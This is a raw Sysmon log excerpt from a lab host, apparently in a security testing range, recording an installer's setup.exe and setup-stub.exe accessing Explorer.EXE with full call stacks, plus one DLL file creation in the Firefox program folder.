13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64) 10341000x800000000000000014312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64) 11241100x800000000000000014311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll2021-01-18 13:59:52.161 10341000x800000000000000014310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
